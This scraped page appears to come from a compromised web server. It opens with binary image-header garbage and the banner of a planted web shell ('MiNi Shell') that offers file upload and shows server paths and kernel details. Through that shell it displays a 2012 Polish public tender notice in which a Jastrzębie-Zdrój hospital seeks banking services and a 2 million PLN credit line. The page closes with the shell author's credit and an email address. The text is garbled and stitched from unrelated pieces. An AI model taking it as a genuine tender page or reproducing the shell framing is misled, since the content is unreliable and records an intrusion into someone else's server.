JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120928/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120928/370748-N-2012.html

<p class="kh_header"><b>Jastrzębie-Zdrój: Obsługa bankowa wraz z udzieleniem kredytu w rachunku bankowym dla Wojewódzkiego Szpitala Specjalistycznego nr 2 w Jastrzębiu-Zdroju DZP/38/382-55/12</b><br>
<b>Numer ogłoszenia: 370748 - 2012; data zamieszczenia: 28.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Szpital Specjalistyczny Nr 2 w Jastrzębiu Zdroju , al. Jana Pawła II 7, 44-335 Jastrzębie-Zdrój, woj. śląskie, tel. 32 47 84 200, faks 32 47 84 506.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wss2.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Obsługa bankowa wraz z udzieleniem kredytu w rachunku bankowym dla Wojewódzkiego Szpitala Specjalistycznego nr 2 w Jastrzębiu-Zdroju DZP/38/382-55/12.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest kompleksowa usługa bankowości elektronicznej z kredytem odnawialnym w rachunku bieżącym dla Wojewódzkiego Szpitala Specjalistycznego nr 2 w Jastrzębiu-Zdroju DZP/38/382-55/12.
2.	Ze względu na informatyczną część zamówienia Wykonawca zobowiązany jest, aby usługa spełniała następujące wymogi:
1)	Dowolny wybór sposobu komunikacji z Bankiem -modem, Internet;
2)	Akceptowany system operacyjny: MS-Windows 9x /ME/ NT/ 2000/ XP/ VISTA/ 7;
3)	Bezpieczeństwo systemu: 
a)	możliwość precyzyjnego określenia uprawnień użytkownika do każdej funkcji oferowanej przez system,
b)	użytkownicy zarejestrowani w systemie muszą posiadać swój indywidualny identyfikator zabezpieczony hasłem,
c)	poufność transmisji -kodowanie przesyłanej informacji,
d)	autentyczność i niezaprzeczalność -identyfikacja osób podpisujących, oraz zabezpieczenie przed modyfikacją przesyłki,
e)	klucze podpisu elektronicznego powinny być zapisane na trwałym nośniku, np. indywidualnej karcie procesorowej, zabezpieczone hasłem, CD-ROM, token, itp.
4)	Program obsługi rachunku bieżącego musi działać w sieci Windows, na 5 stanowiskach komputerowych.
3.	Bankowa obsługa Wojewódzkiego Szpitala Specjalistycznego Nr 2 w Jastrzębiu- Zdroju polegać będzie m.in. na: 
1)	Obsłudze rachunków bankowych, w tym:
a)	otwarciu i prowadzeniu 1 rachunku bieżącego i 4 rachunków pomocniczych oraz nie wyłączając nowo otwieranych rachunków bankowych, które Zamawiający założy w trakcie trwania umowy (w PLN i EURO),
b)	realizacji poleceń przelewów (elektronicznych i papierowych) do innych banków w systemie bankowości elektronicznej (internetowej),
c)	realizacji poleceń przelewów wewnętrznych (elektronicznych i papierowych) między rachunkami w tym samym banku w systemie bankowości elektronicznej (internetowej),
d)	przyjmowaniu wpłat gotówkowych (w złotych i euro),
e)	dokonywaniu wypłat gotówkowych (w złotych i euro),
f)	dokonywaniu przez Zamawiającego codziennej nieodpłatnej wymiany bądź zamiany bilonu (w złotych i euro),
g)	dostarczaniu w formie elektronicznej wyciągów bankowych, zawierających pełny opis operacji gospodarczych zgodnie z dowodami źródłowymi (z możliwością generowania elektronicznych potwierdzeń przelewów), 
h)	udostępnienie informacji o stanie rachunków upoważnionym przez Zamawiającego osobom, posługujących się nośnikiem - hasłem uzgodnionym z Bankiem, 
i)	wydawaniu książeczek czekowych, realizacji poleceń przelewów za pomocą czeków elektronicznych, 
j)	sporządzaniu karty wzorów podpisów , zmianie pełnomocnictw lub umocowaniu nowych, aktualizacji karty wzorów podpisów,
k)	wydawaniu opinii bankowych, zaświadczeń i innych dokumentów,
l)	realizacji stałych zleceń,
m)	instalacji systemów elektronicznej (internetowej) obsługi bankowej na 5 stanowiskach komputerowych oraz bezpłatnym przeszkoleniu wyznaczonych przez Zamawiającego (lub osoby przez niego upoważnionej) pracowników obsługujących te stanowiska, 
n)	zapewnieniu przez Wykonawcę stałego i sprawnego funkcjonowania systemu bankowości elektronicznej (internetowej),
o)	w razie awarii systemu elektronicznej obsługi bankowej, możliwe będzie dokonanie operacji w formie papierowej,
p)	realizacji przelewów walutowych elektronicznych, (w przypadku awarii w formie papierowej). 
2)	Oprocentowaniu środków pieniężnych na rachunkach bankowych.
3)	Lokowaniu wolnych środków pieniężnych na rachunkach bankowych.
4)	Udzieleniu kredytu w rachunku bieżącym do kwoty 2 000 000,00 PLN w okresie obowiązywania umowy.
a)	Kredyt będzie postawiony do dyspozycji Zamawiającego w dniu zawarcia umowy na okres 12 miesięcy z możliwością przedłużenia na kolejny rok.
b)	Kredyt w rachunku bieżącym będzie otwarty i odnawialny. Każda spłata całości części kredytu powoduje, że odnawia się on do pierwotnej wysokości i może być wielokrotnie wykorzystywany.
c)	Kredyt będzie oprocentowany według zmiennej stopy procentowej równej stawce bazowej WIBOR 1M powiększonej o marżę Wykonawcy w stałej wysokości.
d)	Oprocentowanie kredytu może zmieniać się miesięcznie uwzględniając zmianę stawki WIBOR 1M na rynku międzybankowym.
e)	Dla ustalenia wartości stopy procentowej kredytu należy przyjąć stawkę WIBOR 1M liczoną jako średnia miesięczna stawka WIBOR 1M z poprzedniego miesiąca kalendarzowego Ostatecznie o wysokości oprocentowania uruchomionej części kredytu będzie decydować ustalona w danym miesiącu kalendarzowym wartość stawki WIBOR 1M powiększona o zaoferowaną w przetargu stałą marżę Wykonawcy. Dniem zmiany stopy procentowej jest pierwszy dzień kalendarzowy nowego miesiąca kalendarzowego.
f)	Odsetki będą naliczane od zaciągniętej i niespłaconej części kredytu. Odsetki naliczane będą w okresach miesięcznych (miesiąc kalendarzowy), a ich spłata dokonywana będzie w pierwszym dniu roboczym po zakończeniu okresu obrachunkowego.
g)	Za udzielenie kredytu w rachunku bieżącym Wykonawca pobierze prowizję naliczaną jednorazowo co roku w wysokości nie wyższej niż 1 % od wysokości 2 000 000,00 PLN bez naliczania wszelkich dodatkowych prowizji techniczno-operacyjnych, prowizja będzie płatna w terminie uruchomienia kredytu. 
h)	Zamawiający informuje, że oczekuje ustanowienia prawnego zabezpieczenie kredytu w formie cesji z kontraktu Zamawiającego z NFZ w wysokości udzielonego kredytu tj. 2 000 000,00 PLN.
i)	Zamawiający informuje, zabezpieczenie jest wolne od cesji z kontraktu NFZ na rzecz innego podmiotu. 
j)	Zamawiający informuje, że obroty średnio miesięczne kształtują się na poziomie minimum 6 316 000,00 PLN.
k)	Zamawiający informuje, że w razie potrzeby podpisze oświadczenie o poddaniu się egzekucji, weksel oraz deklarację wekslową. 
l)	W razie nie postawienia do dyspozycji Zamawiającego środków pochodzących z kredytu w rachunku bieżącym w określonym przez Zamawiającego terminie Wykonawca zapłaci odsetki od zobowiązań, których termin zapłaty przypada na czas kredytowania i które Zamawiający zamierza uregulować ze środków pochodzących z kredytu.
4.	Szczegółowy opis przedmiotu zamówienia Zamawiający określił w FORMULARZU CENOWYM stanowiącym Załącznik Nr 1 do Specyfikacji Istotnych Warunków Zamówienia.
5.	Informacje dodatkowe.
1)	system elektronicznej obsługi bankowej powinien być zintegrowany z systemem finansowo - księgowym i kadrowo - płacowym Zamawiającego,
2)	system elektronicznej obsługi bankowej powinien umożliwiać: całodobowy dostęp do aktualnych danych o wysokości salda, wolnych środkach i obrotach na rachunkach, składanie zleceń płatniczych krajowych i zagranicznych, składanie dyspozycji bankowych, stały dostęp do informacji o kursach walut, oprocentowania lokat, korzystanie z poczty elektronicznej, zakładania lokat terminowych,
3)	realizacja przedmiotu zamówienia w zakresie instalacji systemu elektronicznej obsługi bankowej odbywać się będzie na sprzęcie komputerowym Zamawiającego,
4)	system elektronicznej obsługi bankowej zainstalowany będzie na 5 stanowiskach komputerowych, 
5)	w przypadku awarii systemu elektronicznej obsługi bankowej zapewniony będzie wykwalifikowany serwis,
6)	w przypadku wymiany oprogramowania systemu elektronicznej obsługi bankowej zapewnione będzie nieodpłatne przeinstalowanie w/w systemu wraz ze szkoleniem przez wykwalifikowany serwis,
7)	polecenia przelewów realizowane będą w dniu złożenia dyspozycji przez Zamawiającego,
8)	środki pieniężne na rachunkach bankowych oprocentowane będą wg średniej stawki WIBID 1M z poprzedniego miesiąca kalendarzowego skorygowaną o stałą marżę bankową, z kwartalną kapitalizacją odsetek, 
9)	w ramach rachunku lokat krótkoterminowych prowadzone będą lokaty typu weekend,
10)	lokaty weekendowe oprocentowane będą wg stawki WIBID O/N pomniejszoną o nie ujemną marżę bankową,
11)	przy oprocentowaniu środków pieniężnych na rachunkach bankowych i rachunku lokat obowiązywać będzie stała marża bankowa,
12)	wolne środki pieniężne lokowane będą z uwzględnieniem zmiennego oprocentowania, automatycznie powyżej kwoty 200 000,00 zł na rachunku lokat krótkoterminowych w ostatnim dniu roboczym tygodnia, 
13)	wolne środki pieniężne lokowane będą na rachunku lokat krótkoterminowych w momencie, gdy oprocentowanie środków pieniężnych na rachunku lokat krótkoterminowych będzie wyższe niż oprocentowanie środków pieniężnych na rachunku bankowym,
14)	za terminowe przekazanie środków pieniężnych na rachunek Zamawiającego odpowiedzialność ponosi wykonawca,
15)	udzielony kredyt przeznaczony będzie na pokrycie działalności Zamawiającego,
16)	od udzielonego kredytu Wykonawca pobierać będzie prowizję od przyznanego kredytu,
17)	w ramach udzielonego kredytu Wykonawca nie będzie pobierał innych opłat i prowizji,
18)	opłaty i prowizje za operacje bankowe nie będą ulegać zmianom w trakcie 2 letniego okresu trwania umowy.
6.	Zamawiający wymaga aby placówka Banku znajdowała się na terenie miasta Jastrzębia-Zdroju czynna co najmniej 6 godzin dziennie (od poniedziałku do piątku).
7.	Zamawiający nie dopuszcza możliwości składania ofert równoważnych. 
8.	Zamawiający nie przewiduje udzielenia zamówień uzupełniających i wariantowych.
9.	Zamawiający nie zamierza wybierać najkorzystniejszej oferty z zastosowaniem aukcji elektronicznej.
10.	Zamawiający nie przewiduje zawarcia umowy ramowej.
11.	Zamawiający nie zamierza ustanowić dynamicznego systemu zakupów..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 66.11.00.00-4, 66.11.30.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W postępowaniu wadium nie obowiązuje</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania - Wykonawca wykaże posiadanie zezwolenia uprawniającego do wykonywania czynności bankowych zgodnie z przepisami ustawy z dnia 29 sierpnia 1997 r. Prawo bankowe (tj. Dz. U. z 2002 r. Nr 72, poz. 665 ze zmianami) lub innego dokumentu potwierdzającego, iż Wykonawca jest uprawniony do wykonywania czynności bankowych na terenie Rzeczypospolitej Polskiej - tylko w przypadku, gdy Wykonawca nie działa na podstawie zezwolenia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadania wiedzy i doświadczenia - Wykonawca udokumentuje, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie wykonał lub wykonuje co najmniej dwa zadania o zakresie i charakterze podobnym do przedmiotu zamówienia. Przez zadanie o zakresie i charakterze podobnym do przedmiotu zamówienia należy rozumieć wykonywanie elektronicznej (internetowej) obsługi bankowej, o wartości min. 50 000,00 zł brutto każda</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Do oferty należy dołączyć również takie dokumenty jak:
1)	wypełniony Formularz asortymentowo - cenowy. Opis techniczny przedmiotu zamówienia (parametry techniczne-graniczne) Warunki gwarancji, serwisu gwarancyjnego i pogwarancyjnego oraz inne wymagania. - według Załącznika nr 1 do SIWZ;
2)	wypełniony Formularz oferty - według Załącznika nr 2 do SIWZ;
3)	pełnomocnictwo do reprezentowania w postępowaniu o udzielenie zamówienia/ pełnomocnictwo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego (w przypadku podmiotów wspólnie ubiegających się o udzielenie zamówienia - konsorcjum, spółka cywilna); umocowanie może wynikać z treści umowy konsorcjum lub treści umowy spółki cywilne</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 50</li>
<li>2 - Oprocentowanie środków pieniężnych na rachunkach bankowych - 20</li>
<li>3 - Oprocentowanie środków pieniężnych na rachunku lokat krótkoterminowych - 15</li>
<li>4 - Koszt kredytu - 15</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zakazuje się zmian postanowień niniejszej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, za wyjątkiem:
a)	zmian zakresu czynności bankowych, o których mowa w Załączniku Nr 1 do SIWZ; w razie wystąpienia takiej potrzeby przez Zamawiającego w oparciu o własną ocenę potrzeb.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wss2.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specjalistyczny Nr 2 w Jastrzębiu- Zdroju, Al.Jana Pawła II 7 ,44-330 Jastrzębie-Zdrój.Dział Zamówień
Publicznych, XI piętro, pokój 9.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.10.2012 godzina 10:00, miejsce: Wojewódzki Szpital Specjalistyczny Nr 2 w Jastrzębiu- Zdroju, Al. Jana Pawła II 7, 44-330
Jastrzębie-Zdrój. Oferty należy składać w sekretariacie Zamawiającego I piętro pokój A1 w godz 7:25 do 15:00.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com